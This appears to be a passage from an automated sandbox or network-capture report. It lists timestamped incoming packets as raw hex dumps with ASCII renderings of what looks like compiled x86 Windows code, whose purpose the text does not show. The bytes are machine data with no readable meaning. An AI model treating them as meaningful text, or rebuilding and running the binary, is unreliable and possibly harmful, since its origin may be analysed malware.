2023-11-18 09:02:40 UTC	2301	IN	Data Raw: 8b 45 10 8b 5e 20 8b 7e 24 85 c0 7e 0f 8b 04 d5 b4 c4 13 10 33 c9 0b c3 0b cf eb 13 75 17 8b 04 d5 b4 c4 13 10 33 c9 f7 d0 f7 d1 23 c3 23 cf 89 4e 24 89 46 20 3b 5e 20 75 05 3b 7e 24 74 27 8b 4e 04 85 c9 74 20 0f 1f 80 00 00 00 00 8b 81 a0 00 00 00 83 e0 fd 83 c8 01 89 81 a0 00 00 00 8b 49 08 85 c9 75 e7 8b 7d 14 85 ff 74 54 8b 0c d5 b4 c4 13 10 33 c0 23 4e 20 23 46 24 0b c8 74 10 b8 01 00 00 00 89 07 33 c0 5f 5e 5b 8b e5 5d c3 33 c0 89 07 5f 5e 5b 8b e5 5d c3 ff 75 18 8b 55 10 ff 75 14 8b 4d 08 e8 11 02 00 00 83 c4 08 5f 5e 5b 8b e5 5d c3 8b 45 08 8b 48 10 8b 45 10 89 01 5f 5e 33 c0 5b 8b e5 5d c3 cc cc cc 55 8b ec 83 ec 08 56 57 8b 7d 08 33 c0 8b cf 89 45 f8 33 f6 e8 07 43 09 00 85 c0 75 27 68 74 09 13 10 68 bf 8e 02 00 68 4c e3 12 10 68 1c e3 12 10 6a Data Ascii: E^ ~$~3u3##N$F ;^ u;~$t'Nt Iu}tT3#N #F$t3_^[]3_^[]uUuM_^[]EHE_^3[]UVW}3E3Cu'hthhLhj
2023-11-18 09:02:40 UTC	2315	IN	Data Raw: 43 d4 89 48 14 8b ce 8b 53 d4 e8 1e 8b 05 00 e9 df 06 00 00 8b 53 ec 85 d2 74 07 8b 0e e8 fb 6d 05 00 8b 53 f8 85 d2 0f 84 c6 06 00 00 8b 0e e8 f9 81 05 00 e9 ba 06 00 00 ff 73 ec 8b 53 d4 8b 4d 0c e8 26 72 05 00 8b 4d 0c 83 c4 04 8b d0 89 43 d4 ff 73 04 e8 13 72 05 00 83 c4 04 e9 8e 06 00 00 8b 75 0c 8b 53 ec 8b 0e e8 ee 72 05 00 ff 73 04 8b d0 89 43 e0 8b ce e8 ef 71 05 00 83 c4 04 89 43 e0 e9 6a 06 00 00 ff 73 04 8b 53 ec 8b 4d 0c e8 d6 71 05 00 83 c4 04 89 43 ec e9 51 06 00 00 8b 4d 0c 8b 53 04 8b 09 e8 ae 72 05 00 89 43 04 e9 3c 06 00 00 8b 75 0c 6a 00 6a 50 8b 06 8b c8 89 44 24 24 e8 72 53 09 00 8b f8 83 c4 08 85 ff 74 45 6a 48 8d 47 08 c7 47 04 01 00 00 00 6a 00 50 c7 07 01 00 00 00 e8 cf 65 f8 ff 8b 4c 24 28 8d 53 d4 c7 47 34 ff ff ff ff 83 c4 0c Data Ascii: CHSStmSsSM&rMCsruSrsCqCjsSMqCQMSrC<ujjPD$$rStEjHGGjPeL$(SG4
2023-11-18 09:02:40 UTC	2321	IN	Data Raw: e8 38 ec 06 00 8b f0 8b 44 24 10 8b 48 20 6a 38 6a 00 8b 41 34 8b 49 18 89 44 24 18 0f bf 41 22 ff 4b 38 89 44 24 34 33 c0 89 44 24 24 89 84 24 94 00 00 00 89 44 24 48 89 44 24 20 89 44 24 38 89 44 24 14 89 44 24 1c 8b 43 38 89 44 24 50 8d 44 24 5c 50 e8 c4 4f f8 ff 8b 45 0c 83 c4 0c 89 44 24 64 8b 45 10 89 44 24 60 8b 47 30 89 44 24 38 89 44 24 7c 89 5c 24 54 8d 48 01 89 7c 24 58 89 4c 24 4c 8d 48 02 83 c0 03 89 74 24 5c 89 84 24 84 00 00 00 8a 47 11 89 4c 24 74 3c 56 74 47 3c 5a 74 0a c7 44 24 6c 02 00 00 00 eb 5b 8b cf e8 28 24 00 00 85 c0 75 50 80 7f 12 58 75 1e 80 7f 10 59 74 44 8b 57 1c 8b cb e8 2e 13 00 00 85 c0 74 36 c7 44 24 6c 03 00 00 00 eb 2c c7 44 24 6c 01 00 00 00 eb 22 80 7f 10 59 74 1c 8b 57 18 8b cb e8 06 13 00 00 8b 4c 24 6c 85 c0 b8 01 Data Ascii: 8D$H j8jA4ID$A"K8D$43D$$$D$HD$ D$8D$D$C8D$PD$\POED$dED$`G0D$8D$\|\$TH\|$XL$LHt$\$GL$t<VtG<ZtD$l[($uPXuYtDW.t6D$l,D$l"YtWL$l
2023-11-18 09:02:40 UTC	2335	IN	Data Raw: 01 8b cf e8 a5 b3 06 00 8b f0 8b 44 24 28 89 74 24 20 89 44 24 10 8b d8 85 c0 0f 84 e3 07 00 00 80 7b 60 00 8b 53 2c 89 54 24 24 74 0b 33 c9 89 4c 24 18 e9 e6 00 00 00 8b 43 48 8b 40 14 85 c0 74 04 8b 08 eb 02 33 c9 33 ff 89 4c 24 18 85 c9 0f 8e c4 00 00 00 0f 1f 80 00 00 00 00 83 ff 01 75 49 81 7a 20 6c 51 13 10 75 40 8b 44 24 10 8b 5d 10 8b 4e 74 43 8b 50 50 8b 44 24 28 42 8b 40 30 89 44 24 2c 39 4e 78 7f 12 53 52 50 8d 57 5b 8b ce e8 26 b0 06 00 83 c4 0c eb 69 8d 41 01 89 46 74 8b 46 70 8b 74 24 2c eb 38 8b 44 24 10 8b 5d 10 8b 4e 74 03 df 8b 50 50 03 d7 39 4e 78 7f 16 53 52 ff 75 08 ba 5c 00 00 00 8b ce e8 eb af 06 00 83 c4 0c eb 2e 8d 41 01 89 46 74 8b 46 70 8b 75 08 8d 0c 89 89 74 88 04 8b 74 24 20 c7 44 88 10 00 00 00 00 89 5c 88 0c 89 54 88 08 c7 Data Ascii: D$(t$ D${`S,T$$t3L$CH@t33L$uIz lQu@D$]NtCPPD$(B@0D$,9NxSRPW[&iAFtFpt$,8D$]NtPP9NxSRu\.AFtFputt$ D\T
2023-11-18 09:02:40 UTC	2345	IN	Data Raw: 74 09 8b 0e 5e 5d e9 8a a1 06 00 5e 5d c3 cc cc cc cc cc cc cc 55 8b ec 8b 4d 08 b8 00 20 00 00 56 8b 71 08 66 85 46 08 75 0e ba 08 00 00 00 e8 81 1e 06 00 8b f0 eb 03 8b 76 10 85 f6 74 36 83 46 04 ff 75 30 57 8b 3e 85 ff 74 22 b8 00 24 00 00 66 85 47 08 75 06 83 7f 18 00 74 07 8b cf e8 b1 a9 06 00 8b 4f 20 8b d7 e8 77 e1 08 00 c7 06 00 00 00 00 5f 5e 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 53 8b 5d 08 b8 00 20 00 00 56 8b 73 08 66 85 46 08 75 10 ba 08 00 00 00 8b cb e8 0e 1e 06 00 8b f0 eb 03 8b 76 10 85 f6 74 4d 57 8b 3e 85 ff 74 22 b8 00 24 00 00 66 85 47 08 75 06 83 7f 18 00 74 07 8b cf e8 44 a9 06 00 8b 4f 20 8b d7 e8 0a e1 08 00 8b 45 10 ff 30 e8 10 2b 06 00 83 c4 04 89 06 5f 85 c0 75 0d 53 e8 00 23 06 00 83 c4 04 5e 5b 5d c3 ff 46 04 Data Ascii: t^]^]UM VqfFuvt6Fu0W>t"$fGutO w_^]US] VsfFuvtMW>t"$fGutDO E0+_uS#^[]F
2023-11-18 09:02:40 UTC	2353	IN	Data Raw: 00 00 c7 43 08 01 00 00 00 c7 43 0c 00 00 00 00 89 87 f4 02 00 00 8b 47 08 66 89 4f 34 85 c0 74 05 8a 00 88 47 2d b8 00 01 00 00 66 85 47 28 74 04 c6 47 2f 01 80 7d aa 01 76 07 81 4b 24 00 00 20 00 8b c1 5f 5e 5b 8b 4d fc 33 cd e8 e0 b7 f7 ff 8b e5 5d c3 8b 5d 94 c7 43 24 01 12 00 00 f6 46 38 20 75 13 8b 55 84 8b 4e 58 8b 46 5c 23 4a 38 23 42 3c 0b c8 75 07 c7 43 24 41 12 00 00 b8 27 00 00 00 66 89 7b 28 66 89 7b 18 89 73 20 66 89 43 14 e9 4b ff ff ff 8b 4d fc 33 c0 5f 5e 33 cd 5b e8 8a b7 f7 ff 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 81 ec 84 00 00 00 53 56 57 8b f9 89 55 ac 89 7d e4 c7 45 b8 00 00 00 00 c7 45 b0 00 00 00 00 8b 07 89 45 98 c7 45 b4 00 00 00 00 c7 45 a8 00 00 00 00 8b 30 0f b6 47 2c 89 75 94 89 45 f8 83 f8 01 7f 07 bb 01 00 00 Data Ascii: CCGfO4tG-fG(tG/}vK$ _^[M3]]C$F8 uUNXF\#J8#B<uC$A'f{(f{s fCKM3_^3[]USVWU}EEEEE0G,uE
2023-11-18 09:02:40 UTC	2369	IN	Data Raw: bc f8 ff 8b 47 24 83 c4 0c a9 00 04 00 00 74 0b c6 47 1c 00 33 c0 5f 5e 5b 5d c3 a9 00 40 00 00 74 07 c7 47 20 00 00 00 00 5f 5e 33 c0 5b 5d c3 cc cc cc cc cc 55 8b ec 83 ec 08 53 56 8b f2 89 4d fc 57 8b 7d 08 0f b7 46 2c 3b c7 7d 55 83 c7 07 83 e7 f8 6a 00 8d 04 bd 00 00 00 00 50 e8 22 7b 08 00 8b d8 83 c4 08 85 db 75 0a 8d 43 07 5f 5e 5b 8b e5 5d c3 0f b7 46 2c c1 e0 02 50 ff 76 30 53 e8 7e bb f8 ff 8b 56 30 8d 46 38 83 c4 0c 3b d0 74 08 8b 4d fc e8 59 7f 08 00 89 5e 30 66 89 7e 2c 5f 5e 33 c0 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc 53 56 8b f2 57 8b f9 8b 56 30 8d 5e 38 3b d3 74 05 e8 2a 7f 08 00 8b d6 8b cf e8 21 00 00 00 33 c0 89 5e 30 66 89 46 28 b8 03 00 00 00 5f 66 89 46 2c c7 46 24 00 00 00 00 5e 5b c3 cc cc cc cc 56 8b f2 57 8b f9 8b 46 24 a9 Data Ascii: G$tG3_^[]@tG _^3[]USVMW}F,;}UjP"{uC_^[]F,Pv0S~V0F8;tMY^0f~,_^3[]SVWV0^8;t*!3^0fF(_fF,F$^[VWF$
2023-11-18 09:02:40 UTC	2383	IN	Data Raw: b6 17 50 56 8b 74 24 28 8b ce e8 1e 79 04 00 83 c4 18 85 c0 74 0f 8b 4f 04 83 e1 01 09 48 04 8b 4f 24 89 48 24 6a 01 8b d0 8b cb e8 8d 16 00 00 8b 4c 24 24 83 c4 04 8b d3 50 e8 ae f5 ff ff 8b 44 24 64 83 c4 04 8b 54 24 54 40 89 44 24 60 3b c2 7c 8a 8b 43 14 8b 54 24 18 66 83 4c 10 0a 06 33 c9 66 89 4c 10 0c e9 cc 02 00 00 8a 27 80 fc 31 0f 85 ac 00 00 00 83 79 1c 00 0f 85 a2 00 00 00 8b 4f 0c 80 39 b0 0f 85 96 00 00 00 f7 47 04 00 08 00 00 0f 84 89 00 00 00 8b 47 14 83 78 34 00 0f 85 7c 00 00 00 83 78 44 00 75 76 80 7b 08 2c 0f 85 7d 02 00 00 33 d2 89 54 24 60 e8 bb 83 04 00 85 c0 0f 8e 6a 02 00 00 0f 1f 00 6a 02 8b d7 8b cb e8 e5 15 00 00 8b 4b 14 8b f0 8b 44 24 64 83 c4 04 40 89 44 24 60 8d 14 76 03 d2 56 89 44 d1 1c 8b d3 8b 4c 24 24 e8 ef f4 ff ff 83 Data Ascii: PVt$(ytOHO$H$jL$$PD$dT$T@D$`;\|CT$fL3fL'1yO9GGx4\|xDuv{,}3T$`jjKD$d@D$`vVDL$$
2023-11-18 09:02:40 UTC	2399	IN	Data Raw: 10 09 10 8b 57 10 89 5d c8 85 d2 74 08 8d 4d d8 e8 c8 77 04 00 8b 7f 08 85 ff 74 23 8b 37 83 c7 08 85 f6 7e 1a 8b 17 85 d2 74 0c 8d 4d d8 e8 aa 77 04 00 85 c0 75 08 4e 83 c7 14 85 f6 7f e6 8b 7d 0c 8b 7f 0c 85 ff 74 23 8b 37 83 c7 08 85 f6 7e 1a 8b 17 85 d2 74 0c 8d 4d d8 e8 7d 77 04 00 85 c0 75 08 4e 83 c7 14 85 f6 7f e6 8b 75 fc 8b 7d 0c 8b 4d f8 43 83 c6 14 89 75 fc 0f b7 41 34 3b d8 8b c1 b9 01 00 00 00 0f 8c ae fe ff ff 5f 5b 5e 8b e5 5d c3 cc cc cc cc cc cc cc 55 8b ec 56 8b 75 0c 80 3e a6 75 5b 8b 45 08 57 8b 78 18 8b 46 1c 3b 47 04 75 46 0f bf 46 20 3b 47 10 75 3d 8b d6 8b cf e8 b3 00 00 00 0f bf 4e 20 85 c9 78 0f 8b 46 2c 03 c9 8b 40 04 0f be 44 c8 08 eb 05 b8 44 00 00 00 88 46 01 8b 47 08 89 46 1c 66 8b 47 0c 66 89 46 20 c7 46 2c 00 00 00 00 5f Data Ascii: W]tMwt#7~tMwuN}t#7~tM}wuNu}MCuA4;_[^]UVu>u[EWxF;GuFF ;Gu=N xF,@DDFGFfGfF F,_
2023-11-18 09:02:40 UTC	2404	IN	Data Raw: 12 10 50 e8 9d c8 07 00 83 c4 10 8b 8d 78 ff ff ff 85 c9 74 28 8b 45 84 c6 04 08 00 83 7d 80 00 76 15 f6 45 89 04 75 0f 8d 8d 74 ff ff ff e8 42 cf 07 00 8b c8 eb 06 8b 8d 78 ff ff ff 8b 85 68 ff ff ff ba b4 00 00 00 6a f9 51 6a 00 ff b0 d4 00 00 00 8b 85 64 ff ff ff 8b c8 ff 70 74 e8 42 96 05 00 83 c4 14 8b f8 8b c7 5f 5e 5b 8b 4d fc 33 cd e8 1a ec f6 ff 8b e5 5d c3 8b 4d fc 33 c0 5f 5e 33 cd 5b e8 07 ec f6 ff 8b e5 5d c3 cc cc cc cc cc cc cc 55 8b ec 83 ec 14 53 8b da 56 8b f1 89 5d f0 57 8b 43 20 0f b7 4b 2a 89 45 fc 0f b7 43 18 89 45 f8 89 4d f4 66 85 c0 75 0a f6 43 24 30 0f 84 59 01 00 00 8b 56 10 83 c2 02 3b 56 08 72 13 6a 02 ba 1c d8 12 10 8b ce e8 f4 cf 07 00 83 c4 04 eb 11 8b 4e 04 89 56 10 66 a1 1c d8 12 10 66 89 44 11 fe 8b 45 f8 33 ff 0f b7 c0 Data Ascii: Pxt(E}vEutBxhjQjdptB_^[M3]M3_^3[]USV]WC K*ECEMfuC$0YV;VrjNVffDE3
2023-11-18 09:02:40 UTC	2416	IN	Data Raw: 00 83 c4 0c eb 32 8b 5d 08 8d 41 01 89 46 74 8d 0c 89 8b 46 70 c7 04 88 55 00 00 00 89 54 88 04 c7 44 88 08 00 00 00 00 c7 44 88 0c 00 00 00 00 c7 44 88 10 00 00 00 00 8b 4c 24 18 0f bf 43 22 47 83 c1 10 89 4c 24 18 3b f8 7c 89 8b 5c 24 0c 8b 53 0c 85 d2 74 12 8b 4c 24 1c 6a 00 6a 00 e8 61 eb 03 00 83 c4 08 eb 02 33 c0 8b 53 08 53 6a 00 6a 00 6a 02 50 51 8b 4c 24 34 6a 00 e8 f3 e6 03 00 8b 54 24 50 83 c4 08 8b 4c 24 34 50 e8 12 11 00 00 83 c4 18 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc 85 c9 74 11 83 39 00 74 0c 39 51 1c 74 07 8b 49 10 85 c9 75 ef 8b c1 c3 cc cc cc cc cc cc cc cc 85 c9 75 03 33 c0 c3 8b 49 10 85 c9 75 06 b8 01 00 00 00 c3 83 39 00 74 f5 33 c0 39 41 1c 0f 94 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 81 ec d0 00 00 00 a1 Data Ascii: 2]AFtFpUTDDDL$C"GL$;\|\$StL$jja3SSjjjPQL$4jT$PL$4P_^[]t9t9QtIuu3Iu9t39AU
2023-11-18 09:02:40 UTC	2432	IN	Data Raw: 74 24 44 e8 5d e1 00 00 8b f0 83 c4 1c 85 f6 74 07 81 4e 04 00 00 00 08 8b 44 24 18 88 44 24 3c 8b 44 24 38 89 44 24 40 8b 45 08 c7 44 24 50 00 00 00 00 c7 44 24 48 00 00 00 00 c7 44 24 4c 00 00 00 00 85 c0 74 0a 0f b7 40 32 89 44 24 44 eb 08 c7 44 24 44 ff ff ff ff 8d 44 24 3c 8b d6 50 8b cf e8 7e 2b 00 00 83 c4 04 85 f6 74 10 8b 4c 24 14 8b d6 6a 01 e8 ba e2 00 00 83 c4 04 5f 5e 5b 8b e5 5d c3 55 8b ec 83 e4 f8 51 53 56 57 8b f9 8b da 6a 00 6a 34 8b 0f e8 07 82 07 00 8b f0 83 c4 08 85 f6 74 43 6a 34 6a 00 56 e8 74 94 f6 ff 83 c4 0c c6 06 4b 83 c8 ff 8b ce 66 89 46 22 e8 10 b9 03 00 8b 07 8b 80 84 00 00 00 39 46 18 7e 0f 50 68 30 9d 12 10 57 e8 77 4c 07 00 83 c4 0c 8d 43 01 66 89 46 20 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc 55 8b ec 8b c2 83 ec 1c 8b 51 Data Ascii: t$D]tND$D$<D$8D$@ED$PD$HD$Lt@2D$DD$DD$<P~+tL$j_^[]UQSVWjj4tCj4jVtKfF"9F~Ph0WwLCfF _^[]UQ
2023-11-18 09:02:40 UTC	2448	IN	Data Raw: 03 c1 89 54 24 3c 89 46 2c 8b 54 24 40 8b ce 6a 00 6a 00 ff 74 24 44 e8 79 0e 03 00 8b 44 24 28 33 c9 83 c4 0c 89 8c 24 84 00 00 00 39 48 20 7e 5d 8b 74 24 1c 33 c0 89 44 24 58 8b 56 1c 03 d0 0f bf 42 12 3b 44 24 6c 7c 28 8b 44 24 3c 8b cf 03 44 24 6c 50 0f bf 42 10 50 ff 72 08 8b 12 e8 f1 27 03 00 8b 8c 24 90 00 00 00 83 c4 0c ff 44 24 6c 8b 44 24 58 41 83 c0 14 89 8c 24 84 00 00 00 89 44 24 58 3b 4e 20 7c b1 8b 74 24 0c 8a 46 13 84 c0 75 08 ff 46 2c 8b 56 2c eb 0f fe c8 88 46 13 0f b6 c0 8b 94 86 94 00 00 00 8b 4f 74 89 54 24 6c 39 4f 78 7f 1e 52 ff 74 24 54 ba 5f 00 00 00 8b cf ff 74 24 44 e8 88 ed 04 00 8b 54 24 78 83 c4 0c eb 33 8b 74 24 3c 8d 41 01 89 47 74 8d 0c 89 8b 47 70 89 74 88 04 8b 74 24 50 89 74 88 08 8b 74 24 0c c7 04 88 5f 00 00 00 89 54 Data Ascii: T$<F,T$@jjt$DyD$(3$9H ~]t$3D$XVB;D$l\|(D$<D$lPBPr'$D$lD$XA$D$X;N \|t$FuF,V,FOtT$l9OxRt$T_t$DT$x3t$<AGtGptt$Ptt$_T
2023-11-18 09:02:40 UTC	2480	IN	Data Raw: ff 75 08 8b fa 8b d6 ff 77 20 e8 c6 00 00 00 0f 57 c0 c7 45 fc 00 00 00 00 83 c4 08 66 0f d6 45 f4 0f 11 45 e4 8b d7 89 75 fc 8d 4d e4 c7 45 e8 c0 12 0a 10 c7 45 ec a0 85 0d 10 e8 35 73 03 00 5f 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 0c 8b 55 08 0f b6 08 81 f9 a6 00 00 00 74 08 81 f9 b2 00 00 00 75 17 8b 4a 18 56 8b 70 1c 3b 31 7d 0b 8b 4c b1 04 85 c9 7e 03 89 48 1c 5e f6 40 04 01 74 15 8b 4a 18 8b 50 24 3b 11 7d 0b 8b 4c 91 04 85 c9 7e 03 89 48 24 33 c0 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 41 18 8b 0a 3b 08 7d 0a 8b 44 88 04 85 c0 7e 02 89 02 c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 0c 53 57 8b 7d 08 8b da 8b d1 33 c9 89 55 f8 89 4d fc 39 0f 7e 78 8b 45 08 83 c7 34 89 7d f4 56 3b 4d 0c 74 5a Data Ascii: uw WEfEEuMEE5s_^]UEUtuJVp;1}L~H^@tJP$;}L~H$3]A;}D~USW}3UM9~xE4}V;MtZ
2023-11-18 09:02:40 UTC	2512	IN	Data Raw: 01 89 46 74 8d 0c 89 8b 46 70 89 54 88 04 8b 54 24 40 c7 04 88 5c 00 00 00 89 54 88 08 89 5c 88 0c c7 44 88 10 00 00 00 00 8b 4e 74 39 4e 78 7f 1f 6a 00 ff 74 24 24 ba 7d 00 00 00 8b ce ff 74 24 30 e8 0e 6e 04 00 8b 54 24 2c 83 c4 0c eb 33 8b 54 24 28 8d 41 01 89 46 74 8d 0c 89 8b 46 70 89 54 88 04 8b 54 24 20 c7 04 88 7d 00 00 00 89 54 88 08 c7 44 88 0c 00 00 00 00 c7 44 88 10 00 00 00 00 8b 4e 74 39 4e 78 7f 17 52 53 ff 74 24 30 ba 7e 00 00 00 8b ce e8 b8 6d 04 00 83 c4 0c eb 2f 8b 7c 24 28 8d 41 01 89 46 74 8d 0c 89 8b 46 70 89 7c 88 04 8b 7c 24 24 c7 04 88 7e 00 00 00 89 5c 88 08 89 54 88 0c c7 44 88 10 00 00 00 00 8b 46 74 85 c0 0f 8e 78 02 00 00 8d 0c 80 ba 08 00 00 00 8b 46 70 66 89 54 88 ee e9 63 02 00 00 8b 55 10 8b 5c 24 14 8b 42 14 8b 56 74 89 Data Ascii: FtFpTT$@\T\DNt9Nxjt$$}t$0nT$,3T$(AFtFpTT$ }TDDNt9NxRSt$0~m/\|$(AFtFp\|\|$$~\TDFtxFpfTcU\$BVt
2023-11-18 09:02:40 UTC	2560	IN	Data Raw: 00 00 00 00 74 51 8b 4c 24 24 83 c1 0b 3b 4c 24 1c 72 15 6a 0b ba 0c ca 12 10 8d 4c 24 18 e8 72 63 06 00 83 c4 04 eb 27 f3 0f 7e 05 0c ca 12 10 89 4c 24 24 03 4c 24 18 66 0f d6 41 f5 66 a1 14 ca 12 10 66 89 41 fd a0 16 ca 12 10 88 41 ff c7 44 24 10 01 00 00 00 f6 47 05 c0 74 4d 8b 4c 24 24 83 c1 0e 3b 4c 24 1c 72 15 6a 0e ba 18 ca 12 10 8d 4c 24 18 e8 1b 63 06 00 83 c4 04 eb 27 f3 0f 7e 05 18 ca 12 10 89 4c 24 24 03 4c 24 18 66 0f d6 41 f2 a1 20 ca 12 10 89 41 fa 66 a1 24 ca 12 10 66 89 41 fe ff 44 24 10 8b 54 24 24 42 3b 54 24 1c 72 15 6a 01 ba f8 92 12 10 8d 4c 24 18 e8 d0 62 06 00 83 c4 04 eb 12 8b 44 24 18 8a 0d f8 92 12 10 89 54 24 24 88 4c 02 ff 8b 4c 24 18 85 c9 74 1f 8b 44 24 24 c6 04 08 00 83 7c 24 20 00 76 10 f6 44 24 29 04 75 09 8d 4c 24 14 e8 Data Ascii: tQL$$;L$rjL$rc'~L$$L$fAffAAD$GtML$$;L$rjL$c'~L$$L$fA Af$fAD$T$$B;T$rjL$bD$T$$LL$tD$$\|$ vD$)uL$
2023-11-18 09:02:40 UTC	2592	IN	Data Raw: 00 8b 4d 08 90 80 3b 00 0f 84 d0 03 00 00 8b 54 24 14 8d 44 24 24 50 8d 44 24 24 33 db 50 53 68 80 00 00 00 6a ff 89 5c 24 2c 89 5c 24 34 e8 92 a7 ff ff 8b 7c 24 34 8b f0 83 c4 14 89 74 24 10 85 f6 0f 85 f9 01 00 00 85 ff 75 0a 8b 5c 24 24 89 5c 24 14 eb ab 33 f6 89 5c 24 1c 89 74 24 14 0f 1f 44 00 00 57 e8 da 84 03 00 83 c4 04 89 44 24 10 83 7d 10 00 0f 84 03 01 00 00 83 f8 64 74 2a 83 f8 65 0f 85 f5 00 00 00 83 7c 24 1c 00 0f 85 f3 00 00 00 8b 45 08 8b 40 20 25 00 01 00 00 83 c8 00 0f 84 df 00 00 00 eb 07 83 7c 24 1c 00 75 62 0f b7 9f 98 00 00 00 8b 4d 08 6a 00 8d 04 dd 04 00 00 00 50 e8 da 41 06 00 8b f0 83 c4 08 89 74 24 14 85 f6 0f 84 67 01 00 00 33 f6 85 db 74 1f 0f 1f 00 6a 00 6a 00 8b d6 8b cf e8 a3 77 03 00 8b 4c 24 1c 83 c4 08 89 04 b1 46 3b f3 Data Ascii: M;T$D$$PD$$3PShj\$,\$4\|$4t$u\$$\$3\$t$DWD$}dt*e\|$E@ %\|$ubMjPAt$g3tjjwL$F;
2023-11-18 09:02:40 UTC	2624	IN	Data Raw: 00 89 44 24 2c e8 ab ac 03 00 8b 84 24 9c 00 00 00 ba 0e 00 00 00 8b 4c 24 18 50 89 44 24 68 e8 01 ad 03 00 8b 4c 24 1c 83 c4 0c ba 5f 00 00 00 8b f0 57 ff 74 24 24 ff 74 24 50 e8 a5 ad 03 00 8b 4c 24 1c 83 c4 0c ba 7d 00 00 00 ff 74 24 24 ff 74 24 44 e8 5c ac 03 00 ff 74 24 2c 8b 4c 24 1c ba 7e 00 00 00 57 ff 74 24 50 e8 75 ad 03 00 8b 4c 24 24 83 c4 14 8b d6 e8 c7 ab 03 00 8b 4c 24 10 8b d6 e8 7c a0 03 00 8b d7 8b 7c 24 2c 8b cf e8 9f b4 01 00 8b 54 24 24 e8 96 b4 01 00 8b 54 24 20 eb 52 8b 4c 24 64 0f 57 c0 0f 29 84 24 90 00 00 00 0f 29 84 24 a0 00 00 00 89 bc 24 90 00 00 00 c7 44 24 40 ff ff ff ff 85 c9 74 22 8b 01 8b d1 8d 8c 24 90 00 00 00 89 44 24 20 e8 b2 49 02 00 85 c0 0f 85 16 0a 00 00 8b 54 24 20 eb 06 33 d2 89 54 24 20 8b 75 0c 85 f6 0f 85 cd Data Ascii: D$,$L$PD$hL$_Wt$$t$PL$}t$$t$D\t$,L$~Wt$PuL$$L$\|\|$,T$$T$ RL$dW)$)$$D$@t"$D$ IT$ 3T$ u
2023-11-18 09:02:40 UTC	2656	IN	Data Raw: 00 00 99 8b 09 66 85 71 08 74 0f 52 50 e8 23 89 03 00 83 c4 08 5e 8b e5 5d c3 89 01 b8 04 00 00 00 89 51 04 66 89 41 08 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 8b 45 08 83 ec 0c 56 8b 30 b8 00 24 00 00 66 85 46 08 74 09 8b ce e8 2f 8f 03 00 eb 09 b8 01 00 00 00 66 89 46 08 f2 0f 10 05 20 cd 13 10 f2 0f 11 44 24 08 8b 4c 24 0c 8b c1 25 00 00 f0 7f 33 d2 75 15 3d 00 00 f0 7f 75 0e 8b 44 24 08 81 e1 ff ff 0f 00 0b c1 75 0d b8 08 00 00 00 f2 0f 11 06 66 89 46 08 5e 8b e5 5d c3 55 8b ec 83 e4 c0 83 ec 3c 56 8b 75 10 ff 36 e8 bc dd 02 00 83 c4 04 83 f8 01 74 09 83 f8 02 0f 85 c8 00 00 00 ff 76 04 e8 a3 dd 02 00 83 c4 04 83 f8 01 74 09 83 f8 02 0f 85 af 00 00 00 8b 0e 0f b7 41 08 a8 08 74 06 f2 0f 10 01 eb 2a a8 24 74 12 8b 51 04 8b 09 e8 44 ff Data Ascii: fqtRP#^]QfA^]UEV0$fFt/fF D$L$%3u=uD$ufF^]U<Vu6tvtAt*$tQD
2023-11-18 09:02:40 UTC	2704	IN	Data Raw: 08 89 54 24 10 85 ff 74 77 83 79 24 00 74 6b ff 4e 38 8b 46 38 89 07 8b 45 08 8b 1e 40 89 46 34 8b 51 24 8b 07 89 44 24 1c 85 d2 74 16 6a 00 6a 00 8b cb e8 8d ab 01 00 8b f8 83 c4 08 8b 44 24 1c eb 02 33 ff 80 7b 53 00 75 0d 6a 10 50 57 56 e8 60 45 01 00 83 c4 10 85 ff 74 09 8b d7 8b cb e8 30 b0 01 00 8b 4c 24 0c c7 46 34 00 00 00 00 c7 44 24 14 00 00 00 00 eb 0d c7 07 00 00 00 00 8b 45 18 89 44 24 14 83 7d 10 00 74 0c f6 41 38 08 74 06 0f b7 41 32 eb 04 0f b7 41 34 0f b7 f8 89 44 24 18 83 ff 01 75 20 8a 46 13 84 c0 75 08 ff 46 2c 8b 5e 2c eb 2f fe c8 88 46 13 0f b6 c0 8b 9c 86 94 00 00 00 eb 1e 8b 5e 20 3b 7e 1c 7f 0b 29 7e 1c 8d 04 1f 89 46 20 eb 0b 8b 46 2c 8d 58 01 03 c7 89 46 2c 8b 44 24 14 85 c0 74 13 3b 5d 1c 75 06 83 78 24 00 74 08 c7 44 24 14 00 Data Ascii: T$twy$tkN8F8E@F4Q$D$tjjD$3{SujPWV`Et0L$F4D$ED$}tA8tA2A4D$u FuF,^,/F^ ;~)~F F,XF,D$t;]ux$tD$
2023-11-18 09:02:40 UTC	2736	IN	Data Raw: b9 12 10 56 e8 4c 0d 05 00 8b 4d f8 83 c4 0c 8b d7 c6 46 11 01 e8 5b f7 ff ff 5f 5e 5b 8b e5 5d c3 8b 57 0c 8b ce e8 ba f0 ff ff 8b ce e8 a3 51 00 00 8b 4d f8 8b d7 c6 46 11 01 e8 35 f7 ff ff 5f 5e 5b 8b e5 5d c3 f6 43 38 03 74 21 6a 00 68 70 b9 12 10 56 e8 fb 0c 05 00 8b 4d f8 83 c4 0c 8b d7 e8 0e f7 ff ff 5f 5e 5b 8b e5 5d c3 8b 53 18 8b 4d f8 e8 2c ae fe ff 8b 49 10 8b d0 8b 43 0c 89 45 f0 8b c2 c1 e0 04 83 fa 01 89 45 ec 89 55 fc ba 09 00 00 00 8b 04 08 b9 50 b0 12 10 50 89 45 f4 b8 10 97 12 10 0f 44 c1 8b ce 6a 00 50 e8 50 70 00 00 83 c4 0c 85 c0 0f 85 a7 00 00 00 8b 45 f0 33 d2 ff 75 f4 83 7d fc 01 8b ce ff 30 0f 94 c2 ff 33 8d 14 55 0a 00 00 00 e8 24 70 00 00 83 c4 0c 85 c0 75 7f 8b ce e8 a6 6e fe ff 89 45 f0 85 c0 74 71 ff 75 fc ba 01 00 00 00 8b Data Ascii: 